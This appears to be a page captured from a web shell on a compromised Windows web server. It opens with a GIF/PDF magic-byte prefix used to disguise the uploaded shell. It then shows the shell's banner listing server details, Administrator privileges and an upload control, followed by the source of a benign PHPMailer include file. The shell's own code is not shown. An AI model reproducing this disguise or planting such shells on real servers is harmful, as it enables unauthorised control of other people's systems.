GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/email/ |
Upload File : |
<? // email/PHPMailer.phpinc // include_filename_purpose. #$DEBUG_include_filename = true; #if ( $_SESSION['gameId'] == 0 ) $DEBUG_include_filename = true; // DEBUG by gameId. #if ( $_SESSION['userId'] == 0 ) $DEBUG_include_filename = true; // DEBUG by userId. if ( !isset($DEBUG_include_filename) ) $DEBUG_include_filename = d_O(); // DEBUG by passthrough. #if ( !isset($DEBUG_include_filename) ) $DEBUG_include_filename = false; // Default false. #if ( $DEBUG_include_filename ) d_On(); // Use instead of t_Begin() for AJAX call. t_Begin($DEBUG_include_filename); // Begin TRACKing include_filename.phpinc. use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; /* Exception class. */ require 'email\src\Exception.php'; /* The main PHPMailer class. */ require 'email\src\PHPMailer.php'; /* SMTP class, needed if you want to use SMTP. */ require 'email\src\SMTP.php'; $mail = new PHPMailer(TRUE); #if ( $DEBUG_include_filename ) d_Off(); // Use instead of t_End() for AJAX call. unset($DEBUG_include_filename); t_End(); // End TRACKing include_filename.phpinc. ?>